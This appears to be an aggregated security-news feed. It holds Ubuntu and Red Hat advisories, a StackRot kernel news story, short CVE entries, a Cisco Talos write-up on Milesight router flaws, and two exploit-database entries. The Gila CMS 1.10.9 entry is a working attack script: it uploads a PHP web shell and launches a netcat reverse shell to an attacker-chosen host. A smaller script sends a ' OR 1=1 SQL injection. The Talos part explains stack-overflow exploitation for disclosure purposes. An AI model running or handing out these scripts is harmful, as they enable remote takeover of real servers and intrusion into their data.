Ubuntu Security Notice 6205-1 - Hangyu Hua discovered that the Flower classifier implementation in the Linux kernel contained an out-of-bounds write vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that for some Intel processors the INVLPG instruction implementation did not properly flush global TLB entries when PCIDs are enabled. An attacker could use this to expose sensitive information or possibly cause undesired behaviors.

    ==========================================================================Ubuntu Security Notice USN-6205-1July 06, 2023linux-gke vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-gke: Linux kernel for Google Container Engine (GKE) systemsDetails:Hangyu Hua discovered that the Flower classifier implementation in theLinux kernel contained an out-of-bounds write vulnerability. An attackercould use this to cause a denial of service (system crash) or possiblyexecute arbitrary code. (CVE-2023-35788, LP: #2023577)It was discovered that for some Intel processors the INVLPG instructionimplementation did not properly flush global TLB entries when PCIDs areenabled. An attacker could use this to expose sensitive information(kernel memory) or possibly cause undesired behaviors. (LP: #2023220)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:   linux-image-5.4.0-1103-gke      5.4.0-1103.110   linux-image-gke                 5.4.0.1103.108   linux-image-gke-5.4             5.4.0.1103.108After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6205-1   https://launchpad.net/bugs/2023220   https://launchpad.net/bugs/2023577   CVE-2023-35788Package Information:   https://launchpad.net/ubuntu/+source/linux-gke/5.4.0-1103.110

Ubuntu Security Notice USN-6205-1

Red Hat Security Advisory 2023-3924-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.12.23.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Container Platform 4.12.23 security update  
Advisory ID:       RHSA-2023:3924-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3924  
Issue date:        2023-07-06  
CVE Names:         CVE-2023-3089  
====================================================================  
1. Summary:

Red Hat OpenShift Container Platform release 4.12.23 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.12.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenShift Container Platform 4.12 - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container  
Platform 4.12.23. See the following advisory for the container images for  
this release:

https://access.redhat.com/errata/RHSA-2023:3925

Security Fix(es):  
* openshift: OCP & FIPS mode (CVE-2023-3089)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.12 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.12/updating/updating-cluster-cli.html

4. Solution:

For OpenShift Container Platform 4.12 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

5. Bugs fixed (https://bugzilla.redhat.com/):

2212085 - CVE-2023-3089 openshift: OCP & FIPS mode

6. JIRA issues fixed (https://issues.redhat.com/):

OCPBUGS-15554 - Placeholder bug for OCP 4.12.0 rpm release

7. Package List:

Red Hat OpenShift Container Platform 4.12:

Source:  
container-selinux-2.215.0-1.rhaos4.12.el8.src.rpm  
openshift-4.12.0-202306251254.p0.gc43ddea.assembly.stream.el8.src.rpm  
openshift-ansible-4.12.0-202306230041.p0.g74dc7b3.assembly.stream.el8.src.rpm  
openshift-clients-4.12.0-202306230041.p0.gea7c11a.assembly.stream.el8.src.rpm  
openshift-kuryr-4.12.0-202306230041.p0.g31dd228.assembly.stream.el8.src.rpm  
openshift4-aws-iso-4.12.0-202306230041.p0.gd2acdd5.assembly.stream.el8.src.rpm  
ovn23.06-23.06.0-13.el8fdp.src.rpm

aarch64:  
openshift-clients-4.12.0-202306230041.p0.gea7c11a.assembly.stream.el8.aarch64.rpm  
openshift-hyperkube-4.12.0-202306251254.p0.gc43ddea.assembly.stream.el8.aarch64.rpm  
ovn23.06-23.06.0-13.el8fdp.aarch64.rpm  
ovn23.06-central-23.06.0-13.el8fdp.aarch64.rpm  
ovn23.06-central-debuginfo-23.06.0-13.el8fdp.aarch64.rpm  
ovn23.06-debuginfo-23.06.0-13.el8fdp.aarch64.rpm  
ovn23.06-debugsource-23.06.0-13.el8fdp.aarch64.rpm  
ovn23.06-host-23.06.0-13.el8fdp.aarch64.rpm  
ovn23.06-host-debuginfo-23.06.0-13.el8fdp.aarch64.rpm  
ovn23.06-vtep-23.06.0-13.el8fdp.aarch64.rpm  
ovn23.06-vtep-debuginfo-23.06.0-13.el8fdp.aarch64.rpm

noarch:  
container-selinux-2.215.0-1.rhaos4.12.el8.noarch.rpm  
openshift-ansible-4.12.0-202306230041.p0.g74dc7b3.assembly.stream.el8.noarch.rpm  
openshift-ansible-test-4.12.0-202306230041.p0.g74dc7b3.assembly.stream.el8.noarch.rpm  
openshift-kuryr-cni-4.12.0-202306230041.p0.g31dd228.assembly.stream.el8.noarch.rpm  
openshift-kuryr-common-4.12.0-202306230041.p0.g31dd228.assembly.stream.el8.noarch.rpm  
openshift-kuryr-controller-4.12.0-202306230041.p0.g31dd228.assembly.stream.el8.noarch.rpm  
openshift4-aws-iso-4.12.0-202306230041.p0.gd2acdd5.assembly.stream.el8.noarch.rpm  
python3-kuryr-kubernetes-4.12.0-202306230041.p0.g31dd228.assembly.stream.el8.noarch.rpm

ppc64le:  
openshift-clients-4.12.0-202306230041.p0.gea7c11a.assembly.stream.el8.ppc64le.rpm  
openshift-hyperkube-4.12.0-202306251254.p0.gc43ddea.assembly.stream.el8.ppc64le.rpm  
ovn23.06-23.06.0-13.el8fdp.ppc64le.rpm  
ovn23.06-central-23.06.0-13.el8fdp.ppc64le.rpm  
ovn23.06-central-debuginfo-23.06.0-13.el8fdp.ppc64le.rpm  
ovn23.06-debuginfo-23.06.0-13.el8fdp.ppc64le.rpm  
ovn23.06-debugsource-23.06.0-13.el8fdp.ppc64le.rpm  
ovn23.06-host-23.06.0-13.el8fdp.ppc64le.rpm  
ovn23.06-host-debuginfo-23.06.0-13.el8fdp.ppc64le.rpm  
ovn23.06-vtep-23.06.0-13.el8fdp.ppc64le.rpm  
ovn23.06-vtep-debuginfo-23.06.0-13.el8fdp.ppc64le.rpm

s390x:  
openshift-clients-4.12.0-202306230041.p0.gea7c11a.assembly.stream.el8.s390x.rpm  
openshift-hyperkube-4.12.0-202306251254.p0.gc43ddea.assembly.stream.el8.s390x.rpm  
ovn23.06-23.06.0-13.el8fdp.s390x.rpm  
ovn23.06-central-23.06.0-13.el8fdp.s390x.rpm  
ovn23.06-central-debuginfo-23.06.0-13.el8fdp.s390x.rpm  
ovn23.06-debuginfo-23.06.0-13.el8fdp.s390x.rpm  
ovn23.06-debugsource-23.06.0-13.el8fdp.s390x.rpm  
ovn23.06-host-23.06.0-13.el8fdp.s390x.rpm  
ovn23.06-host-debuginfo-23.06.0-13.el8fdp.s390x.rpm  
ovn23.06-vtep-23.06.0-13.el8fdp.s390x.rpm  
ovn23.06-vtep-debuginfo-23.06.0-13.el8fdp.s390x.rpm

x86_64:  
openshift-clients-4.12.0-202306230041.p0.gea7c11a.assembly.stream.el8.x86_64.rpm  
openshift-clients-redistributable-4.12.0-202306230041.p0.gea7c11a.assembly.stream.el8.x86_64.rpm  
openshift-hyperkube-4.12.0-202306251254.p0.gc43ddea.assembly.stream.el8.x86_64.rpm  
ovn23.06-23.06.0-13.el8fdp.x86_64.rpm  
ovn23.06-central-23.06.0-13.el8fdp.x86_64.rpm  
ovn23.06-central-debuginfo-23.06.0-13.el8fdp.x86_64.rpm  
ovn23.06-debuginfo-23.06.0-13.el8fdp.x86_64.rpm  
ovn23.06-debugsource-23.06.0-13.el8fdp.x86_64.rpm  
ovn23.06-host-23.06.0-13.el8fdp.x86_64.rpm  
ovn23.06-host-debuginfo-23.06.0-13.el8fdp.x86_64.rpm  
ovn23.06-vtep-23.06.0-13.el8fdp.x86_64.rpm  
ovn23.06-vtep-debuginfo-23.06.0-13.el8fdp.x86_64.rpm

Red Hat OpenShift Container Platform 4.12:

Source:  
openshift-4.12.0-202306251254.p0.gc43ddea.assembly.stream.el9.src.rpm  
openshift-clients-4.12.0-202306230041.p0.gea7c11a.assembly.stream.el9.src.rpm

aarch64:  
openshift-clients-4.12.0-202306230041.p0.gea7c11a.assembly.stream.el9.aarch64.rpm  
openshift-hyperkube-4.12.0-202306251254.p0.gc43ddea.assembly.stream.el9.aarch64.rpm

ppc64le:  
openshift-clients-4.12.0-202306230041.p0.gea7c11a.assembly.stream.el9.ppc64le.rpm  
openshift-hyperkube-4.12.0-202306251254.p0.gc43ddea.assembly.stream.el9.ppc64le.rpm

s390x:  
openshift-clients-4.12.0-202306230041.p0.gea7c11a.assembly.stream.el9.s390x.rpm  
openshift-hyperkube-4.12.0-202306251254.p0.gc43ddea.assembly.stream.el9.s390x.rpm

x86_64:  
openshift-clients-4.12.0-202306230041.p0.gea7c11a.assembly.stream.el9.x86_64.rpm  
openshift-clients-redistributable-4.12.0-202306230041.p0.gea7c11a.assembly.stream.el9.x86_64.rpm  
openshift-hyperkube-4.12.0-202306251254.p0.gc43ddea.assembly.stream.el9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

8. References:

https://access.redhat.com/security/cve/CVE-2023-3089  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-001

9. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkpuK2AAoJENzjgjWX9erED1sP/icqm9LST7YtZknWJ1ckfhHB  
AFAHunAp4sIGzfBy85rpka7ZEX8vsWKLnhEFjqGbUvfUzrvMdJSLHXuYriv07094  
6wCPUV09r0b9zj3e6SZugIU91B9xJDn7WOGPilNmfYwmneuZpmJSBPXopOYQX8eP  
F0NehXcRU3I0efeo0pRpzZYxWuRaN6/281qUtMa3FIgrFKZpHe+65IxVhMBsJyul  
gLpYR4S1K3weoYtFUPMgGHHhjgX8hdoF2M8kz+0TKfEoN/B5B+LvL4Qp4WCZW2j3  
3wy85lCZYijCCU+f2jaedumNlvwY26xON9OgUgVs8cIkGe9HhAoxhX5dReOH53h1  
Ay+dxJTgC9pXT0tmlAbGQjUBLAGOMhzGFS+evn45ba+dQurQLKd2u6KaOJvdR9Vn  
ALgovZbHo8UkvLyZYeUEKGn0UMUQlOHkyzdcfGXtJ6QwygrfeGw0QElXJjpJo6ga  
hH4oSMtgQ/w7t74EisUd6myvqvP7BrFgEIiLtpM1DFzNTO7gf3ODOtHuxxsl9SYQ  
FwbG8Xw9xiAhHle+8kFzHhUGvpxf1pIwCwU2oAnZkIbhhLvXC2f9gcEZ3W5i/hwD  
cVb2/fYMYngD/oyI7f334Mm9ujEOquNk503VF/bB0YCAit3widD+weHWAp4Ntlif  
tVVJhSZwStb3jYZaSbtz  
=JF7v  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3924-01

Lost and Found Information System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Lost and Found Information System v1.0 - SQL Injection# Date: 2023-06-30# country: Iran# Exploit Author: Amirhossein Bahramizadeh# Category : webapps# Dork : /php-lfis/admin/?page=system_info/contact_information# Tested on: Windows/Linux# CVE : CVE-2023-33592import requests# URL of the vulnerable componenturl = "http://example.com/php-lfis/admin/?page=system_info/contact_information"# Injecting a SQL query to exploit the vulnerabilitypayload = "' OR 1=1 -- "# Send the request with the injected payloadresponse = requests.get(url + payload)# Check if the SQL injection was successfulif "admin" in response.text:    print("SQL injection successful!")else:    print("SQL injection failed.")

Lost And Found Information System 1.0 SQL Injection

Gila CMS version 1.10.9 suffers from a remote code execution vulnerability.

    # Exploit Title: Gila CMS 1.10.9 - Remote Code Execution (RCE) (Authenticated)# Date: 05-07-2023# Exploit Author: Omer Shaik (unknown_exploit)# Vendor Homepage: https://gilacms.com/# Software Link: https://github.com/GilaCMS/gila/# Version: Gila 1.10.9# Tested on: Linuximport requestsfrom termcolor import coloredfrom urllib.parse import urlparse# Print ASCII artascii_art = """ ██████╗ ██╗██╗      █████╗      ██████╗███╗   ███╗███████╗    ██████╗  ██████╗███████╗██╔════╝ ██║██║     ██╔══██╗    ██╔════╝████╗ ████║██╔════╝    ██╔══██╗██╔════╝██╔════╝██║  ███╗██║██║     ███████║    ██║     ██╔████╔██║███████╗    ██████╔╝██║     █████╗  ██║   ██║██║██║     ██╔══██║    ██║     ██║╚██╔╝██║╚════██║    ██╔══██╗██║     ██╔══╝  ╚██████╔╝██║███████╗██║  ██║    ╚██████╗██║ ╚═╝ ██║███████║    ██║  ██║╚██████╗███████╗ ╚═════╝ ╚═╝╚══════╝╚═╝  ╚═╝     ╚═════╝╚═╝     ╚═╝╚══════╝    ╚═╝  ╚═╝ ╚═════╝╚══════╝                              by Unknown_Exploit"""print(colored(ascii_art, "green"))# Prompt user for target URLtarget_url = input("Enter the target login URL (e.g., http://example.com/admin/): ")# Extract domain from target URLparsed_url = urlparse(target_url)domain = parsed_url.netloctarget_url_2 = f"http://{domain}/"# Prompt user for login credentialsusername = input("Enter the email: ")password = input("Enter the password: ")# Create a session and perform loginsession = requests.Session()login_payload = {    'action': 'login',    'username': username,    'password': password}response = session.post(target_url, data=login_payload)cookie = response.cookies.get_dict()var1 = cookie['PHPSESSID']var2 = cookie['GSESSIONID']# Prompt user for local IP and portlhost = input("Enter the local IP (LHOST): ")lport = input("Enter the local port (LPORT): ")# Construct the payloadpayload = f"rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash+-i+2>%261|nc+{lhost}+{lport}+>/tmp/f"payload_url = f"{target_url_2}tmp/shell.php7?cmd={payload}"# Perform file upload using POST requestupload_url = f"{target_url_2}fm/upload"upload_headers = {    "Host": domain,    "Content-Length": "424",    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36",    "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarynKy5BIIJQcZC80i2",    "Accept": "*/*",    "Origin": target_url_2,    "Referer": f"{target_url_2}admin/fm?f=tmp/.htaccess",    "Accept-Encoding": "gzip, deflate",    "Accept-Language": "en-US,en;q=0.9",    "Cookie": f"PHPSESSID={var1}; GSESSIONID={var2}",    "Connection": "close"}upload_data = f'''------WebKitFormBoundarynKy5BIIJQcZC80i2Content-Disposition: form-data; name="uploadfiles"; filename="shell.php7"Content-Type: application/x-php<?php system($_GET["cmd"]);?>------WebKitFormBoundarynKy5BIIJQcZC80i2Content-Disposition: form-data; name="path"tmp------WebKitFormBoundarynKy5BIIJQcZC80i2Content-Disposition: form-data; name="g_response"content------WebKitFormBoundarynKy5BIIJQcZC80i2--'''upload_response = session.post(upload_url, headers=upload_headers, data=upload_data)if upload_response.status_code == 200:    print("File uploaded successfully.")    # Execute payload    response = session.get(payload_url)    print("Payload executed successfully.")else:    print("Error uploading the file:", upload_response.text)

Gila CMS 1.10.9 Remote Code Execution

Linus Torvalds led a Linux kernel team in developing a set of patches for the privilege escalation flaw.

Exploit code will soon become available for a critical vulnerability in the Linux kernel that a security researcher discovered and reported to Linux administrators in mid-June.

The bug, which the researcher labeled StackRot (CVE-2023-3269), affects Linux kernel 6.1 through 6.4 and gives attackers a way to escalate privileges on affected systems.

**Affects All Linux Configurations**

Security researcher Ruihan Li of Peking University in China discovered the vulnerability and described it this week as affecting almost all Linux kernel configurations and requiring minimal capabilities to trigger.

A response team, led by Linux creator Linus Torvalds, worked about two weeks on developing a set of patches to address the vulnerability. 

"On June 28th, during the merge window for Linux kernel 6.5, the fix was merged into Linus' tree," Li said in a GitHub post announcing his discovery. "Linus provided a comprehensive merge message to elucidate the patch series from a technical perspective," Li noted.

The patches have since been backported to kernels 6.1.37, 6.2.11, and 6.4.1, "effectively resolving the 'StackRot' bug on July 1," Li wrote. "The complete exploit code and a comprehensive write-up will be made publicly available no later than the end of July."

StackRot pertains to the Linux kernel's handing of stack expansion, a mechanism for automatically growing or expanding the stack memory of a running process.

The data structure for managing virtual memory spaces in the Linux kernel handles a particular memory management function in a manner that results in use-after-free-by-RCU (UAFBR) issues, Li said. UAFBR flaws combine the use-after-free vulnerability with what is known as the Read-Copy-Update (RCU) mechanism in the Linux kernel for synchronizing the use of shared data.

Use-after-free is a type of vulnerability where a software program continues to use a memory reference after it has been deallocated or freed. This gives attackers a way to insert arbitrary code into the freed but still used memory space. "An unprivileged local user could use this flaw to compromise the kernel and escalate their privileges," Li said. The Linux kernel uses the RCU mechanism to free or deallocate used memory space.

While UAFBR vulnerabilities can be dangerous, they are not easy to exploit because of a certain delay that happens with memory deallocation when memory spaces are freed using RCU callbacks, Li explained.

**First-of-Its-Kind Exploit**

The researcher described the exploit for StackRot as likely the first to successfully exploit a UAFBR bug. "To the best of my knowledge, there are currently no publicly available exploits targeting use-after-free-by-RCU bugs," Li said. "This marks the first instance where UAFBR bugs have been proven to be exploitable."

The Linux kernel teams fix for the flaw — led by Torvalds — basically modifies the kernel's user mode stack expansion code to prevent the use-after-free condition from happening.

"It's actually something we always technically should have done," Torvalds said in a GitHub post. "But because we didn't strictly need \[it\], we were being lazy ('opportunistic' sounds so much better, doesn't it?) about things."

StackRot Linux Kernel Bug Has Exploit Code on the Way

An issue was discovered in the USB subsystem in the Linux kernel through 6.4.2. There is an out-of-bounds and crash in read_descriptors in drivers/usb/core/sysfs.c.

CVE-2023-37453

An issue was discovered in the Linux kernel through 6.4.2. A crafted UDF filesystem image causes a use-after-free write operation in the udf_put_super and udf_close_lvid functions in fs/udf/super.c.

CVE-2023-37454

An issue in Zimbra Collaboration ZCS v.8.8.15 and v.9.0 allows an attacker to execute arbitrary code via the sfdc_preauth.jsp component.

CVE-2023-29382: Security Center - Zimbra :: Tech Center

In all, Cisco Talos is releasing 22 security advisories today, nine of which have a CVSS score greater than 8, associated with 69 CVEs.

Thursday, July 6, 2023 11:07

*   Cisco Talos discovered 17 vulnerabilities (63 CVEs) in the Milesight UR32L router and five vulnerabilities (six CVEs) in the Milesight MilesightVPN remote access solution software.
*   An attacker could exploit the vulnerabilities discovered to completely compromise the UR32L and MilesightVPN.
*   This post presents an attack scenario in which the UR32L is only reachable through the MilesightVPN remote access solution. The blog explains how an attacker could exploit the MilesightVPN and then fully compromise the UR32L.

Cisco Talos recently discovered several vulnerabilities in Milesight‘s UR32L – an ARMv7 Linux-based industrial cellular router — and Milesight’s MilesightVPN, a remote access solution for Milesight devices.

In all, Cisco Talos is releasing 22 security advisories today, nine of which have a CVSS score greater than 8, associated with 69 CVEs. Talos is disclosing these vulnerabilities despite no official fix from Milesight, in adherence to Cisco’s vulnerability disclosure policy. Milesight did not respond appropriately during the 90-day period as outlined in the policy.

The MilesightVPN is the remote access solution for Milesight devices not directly exposed to the internet. The MilesightVPN will perform this through a VPN system, making the VPN setup for the devices and the administrator easy. The MilesightVPN provides an HTTP admin page to monitor devices’ tunnel connection to the MilesightVPN itself and generate VPN configuration to join devices’ VPNs. By default, the MilesightVPN binds the HTTP server ports and the one VPN port on all interfaces. This software must be installed on a server machine reachable by the administrator and devices. Because of this, the most popular setup for administrator is to expose the MilesightVPN to the internet.

The Milesight UR32L is an industrial router that offers cellular capabilities. The router supports multiple users with different permissions. It offers a shell with restricted capabilities access. And many common industrial router features and functionalities. The Milesight UR32L does not include the ability to obtain and act with root privileges.

**Attack scenario overview**

In this blog post, Talos will present an attack scenario in which an adversary targets the Milesight UR32L, where the router is not exposed to the internet and instead uses a VPN tunnel for providing access to its internal network and the router itself. We considered the scenario where the device is managed through MilesightVPN. This software must be installed on a machine that is reachable by the UR32L router and the administrator. For the purposes of this post, we assume the MilesightVPN server is exposed to the internet.

MilesightVPN uses OpenVPN as the underlying VPN system. It is an excellent choice to use a well-established VPN system. OpenVPN is a well-known, tested VPN technology, which means it is less likely to have major security issues. But the MilesightVPN creates services around the OpenVPN tunnel like an HTTP server to monitor the connections and to generate OpenVPN configuration for joining the device’s VPN. By default, the MilesightVPN binds the HTTP server ports and the OpenVPN one on all interfaces. So, if the MilesightVPN is accessible on the internet, those services are by default accessible, too.

The UR32L has its own HTTP server; which allows users to manage the router configuration. We are also assuming the UR32L’s HTTP server is only accessible from the VPN and the MilesightVPN server is the only node that can generate a VPN configuration.

_An illustration of the proposed attack scenario._

The graphic below includes only the vulnerabilities relevant to this proposed attack scenario. This graphic shows the steps that an attacker could take to obtain root access to a Milesight UR32L:

**Attack walkthrough**

After locating the IP address of the MilesightVPN server, the attacker still cannot log in to the HTTP admin page due to the lack of valid credentials. The HTTP server login page of MilesightVPN looks like this:

From this point, an attacker could exploit TALOS-2023-1701 (CVE-2023-22319) to bypass the login and access the admin web pages on MilesightVPN. This vulnerability is a SQL injection in the _LoginAuth_ function responsible for checking the provided credentials. The check uses SQL without a prepared statement or any form of sanitization. The _LoginAuth_ code is shown below:

        function LoginAuth(res,postdata,connection){ 
            console.info('#######log.node:loginauth start'); 
            var sha512=crypto.createHash('sha512'); 
            sha512.update(postdata.pwd); 
            var pwd=sha512.digest('hex'); 
    [1]     $sql="select * from user where user='"+postdata.user+"' and passwd='"+pwd+"'"; 
    [2]     connection.query($sql).then(function(data){ 
                var result={}; 
                if(data['error']) 
                { 
                    [...] 
                } 
                else 
                { 
                    if(data['result'].length>0) 
                    { 
                        var dt=data['result']; 
                        result['status']=1; 
                        var token=generateToken(dt[0]['user']); 
                        var exp=new Date(
                            new Date().getTime()+
                                expiretime*1000).toUTCString(); 
                        res.setHeader('Set-Cookie',['token='+token]); 
                        console.info('#######log.node:loginauth success'); 
                        res.write(JSON.stringify(result)); 
                        res.end(); 
                    } 
                    else 
                    { 
                        [...] 
                    } 
                } 
            }); 
        } 
    

At _[1],_ the function composes, the SQL query for checking if the username and password provided correspond to the one of an existing user. Then, at _[2]_, the query is executed, if the resulting table is not empty a JWT, corresponding to the first matched user, is crafted and placed in the response header as the value of _Set-Cookie_. This function is vulnerable to a SQL injection vulnerability because the "preparation" of the query string is performed through string concatenation instead of a prepared statement. This SQL injection can allow an attacker to bypass the authentication of the HTTP server and gain admin access.

After bypassing the login page, an attacker would be presented with the following interface. The example below includes an interface with multiple devices registered and a single device that has an active connection.

From here, an attacker can glean information about the devices connected to the server and their IPs. Furthermore, it is possible to obtain an OpenVPN configuration file to join the VPN tunnel and communicate with the devices that were previously unreachable. The attacker can now communicate with all devices in the VPN. The following image is the HTTP server login page of the Milesight UR32L router:

From here, several attack paths are possible. TALOS-2023-1697 (CVE-2023-23902) is a pre-authentication stack-based buffer overflow that can lead to arbitrary remote code execution (RCE).

The attacker's only requirement is to be able to communicate with the router's HTTP server. This vulnerability is a pre-authentication, stack-based buffer overflow in the _decrypt_string_ function of the _uhttpd_ binary, the UR32L’s HTTP server binary. This function is responsible for decrypting the login password provided for the webpage login. The password sent from the browser is first AES-encrypted and then Base64-encoded. The _decrypt_string_ will Base64 decode and then AES decrypt the password.

The _uhttpd_ binary is not a Position Independent Executable (PIE), meaning that the binary is always loaded at the same virtual memory addresses, but the libraries are Position Independent Code (PIC). This makes it possible for an attacker to perform a code reuse attack using the binary code without any information leaks unless the attacker needs to reuse some of the libraries' code. Furthermore, the code reuse attack scenario is the path of least resistance for exploitation because no stack canary is used in this binary.

The binary is executed as root and makes use of functions such as _system_ and _popen_, as such, one of the options would be to mount an attack aiming to execute OS commands.

The following is a code snippet of the _uhttpd’ decrypt_string_:

    void decrypt_string(
        char *b64_encrypted_password,
        char *decrypted_password,
        size_t size_decrypted_password)
    { 
        [...] 
        uchar stack_decrypted_string [72]; 
        [... init the AES_key variable] 
        [... init the AES_IV variable] 
        [... calculate the __size variable value ...] 
        base64_decoded_string_start = (uchar *)malloc(__size); 
        [...] 
        memset(base64_decoded_string_start,0,__size); 
        processed_len = 0; 
        base64_decode_string_cursor = base64_decoded_string_start; 
        do { 
            // this check allow to base64 decode the string before decrypting it 
            if ((password_len_ - padding) <= processed_len) { 
                *base64_decode_string_cursor = '\0'; 
                ctx = EVP_CIPHER_CTX_new(); 
                [... check error ...] 
                cipher_type = EVP_aes_128_cbc(); 
                processed_len = EVP_DecryptInit_ex(
                    ctx,
                    cipher_type,
                    (ENGINE *)0x0,
                    AES_key,
                    AES_IV); 
                [... check error ...] 
    [1]         processed_len = EVP_DecryptUpdate(
                    ctx,
                    stack_decrypted_string,
                    &output_len,
                    base64_decoded_string_start,
                    (base64_decode_string_cursor + 
                        (-1 - base64_decoded_string_start)));                              
                [... check error ...] 
                processed_len = output_len; 
                iVar3 = EVP_DecryptFinal_ex(
                    ctx,
                    stack_decrypted_string + output_len,&output_len); 
                [... check error ...] 
                processed_len = processed_len + output_len; 
                EVP_CIPHER_CTX_free(ctx); 
                stack_decrypted_string[processed_len] = '\0'; 
                EVP_cleanup(); 
                ERR_free_strings(); 
                free(base64_decoded_string_start); 
    [2]         strncpy(
                    decrypted_password,
                    (char*)stack_decrypted_string,
                    size_decrypted_password);                 
                return; 
            } 
            [...] 
    [3]    	[... base64 decode ...]                 
        } while( true ); 
    } 
    

This function has three parameters: the _b64_encrypted_password_ parameter is the AES-encrypted and Base64-encoded password string that will be Base64 decoded and then AES decrypted; _decrypted_password_ is the destination buffer where the decoded and decrypted password will be copied;  _size_decrypted_password_ is the size of the _decrypted_password_ buffer. At _[3]_ the _b64_encrypted_password_ string is Base64 decoded and then, at _[1],_ the decoded value is AES decrypted into stack_decrypted_string, a 72-byte long stack buffer. Eventually, at _[2],_ _size_decrypted_password_ bytes will be copied from the _stack_decrypted_string_ buffer into the decrypted_password buffer.

In the _decrypted_password_ only _size_decrypted_password_ bytes will be copied, which will prevent any type of buffer overflow in the _decrypted_password_ buffer.

At _[1]_ the _OpenSSL's EVP_DecryptUpdate_ function will perform the AES decryption of the Base64 decoded user-controlled data into the _stack_decrypted_string_ stack buffer. Because the _stack_decrypted_string_ stack buffer is fixed in size and the decrypted string, provided by a user, can be greater in length than the stack buffer. This can lead to a buffer overflow in the _stack_decrypted_string_ buffer.

Essentially, the login API accepts the password as the Base64 encoding of the AES encryption of the password content. This function is used to decode the Base64 string and then AES decrypts it to obtain the actual password value.  The vulnerability is that the password can overflow a stack buffer overwriting the stack content, including the stored return address.

The exploitation of this vulnerability becomes easier because of the epilogue of this function:

      strncpy(
          decrypted_password,
          (char*)stack_decrypted_string,
          size_decrypted_password);          
      return; 
    

The _decrypted_password_ is a buffer in the function caller stack space where the decoded and decrypted password is saved. In assembly, this looks like:

    ldr r0, [sp,#0xc]  
    bl strncpy  
    add sp, sp, #0x84  
    pop {r4,r5,r6,r7,r8,r9,r10,r11,pc} 
    

The function that copies the plain text password into the _decrypted_password_ array, which is also the last function call before returning to the caller, is _strncpy_. The r0 register is used for passing the first argument of the function; in the case of _strncpy_, _r0_ points to the destination buffer. After the _strncpy_ function call r0 will point to the beginning of the plaintext password.

The fact that the vulnerability considered is a stack buffer overflow, the binary does not have a stack canary, the binary is not PIE and uses the _system_ function in combination with the fact that we control the content of what r0 points to, makes the exploitation straightforward. An attacker could overwrite the return address making the function return to the _system_ function and controlling the executed shell command by placing the command to execute at the beginning of the plaintext password payload, as shown in the gdb screenshot below.

The _pc_ is the last instruction of the _decrypt_string_ function and the return address was overwritten with the system plt entry, know because the binary is not PIE, and the _r0_ registry points to the _controllable_ string. So, the _decrypt_string_ returning will execute _system(“controllable”)_.

**Vulnerability Details**

The following vulnerabilities are command injection issues in Milesight UR32L. These vulnerabilities exist in different functionalities of the router. An attacker could exploit these vulnerabilities by sending a specially crafted network packet to a targeted device:

*   TALOS-2023-1694 (CVE-2023-23550)
*   TALOS-2023-1698 (CVE-2023-22306)
*   TALOS-2023-1699 (CVE-2023-22659)
*   TALOS-2023-1706 (CVE-2023-24519 - CVE-2023-24520)
*   TALOS-2023-1710 (CVE-2023-24582 - CVE-2023-24583)
*   TALOS-2023-1711 (CVE-2023-22365)
*   TALOS-2023-1712 (CVE-2023-22299)
*   TALOS-2023-1713 (CVE-2023-24595)
*   TALOS-2023-1714 (CVE-2023-22653)
*   TALOS-2023-1723 (CVE-2023-25582 - CVE-2023-25583)

There are also several vulnerabilities in the UR32L that could lead to a buffer overflow. An attacker could trigger these vulnerabilities by sending a specially crafted HTTP request or network request to the targeted device, depending on the specific vulnerability.

*   TALOS-2023-1697 (CVE-2023-23902)
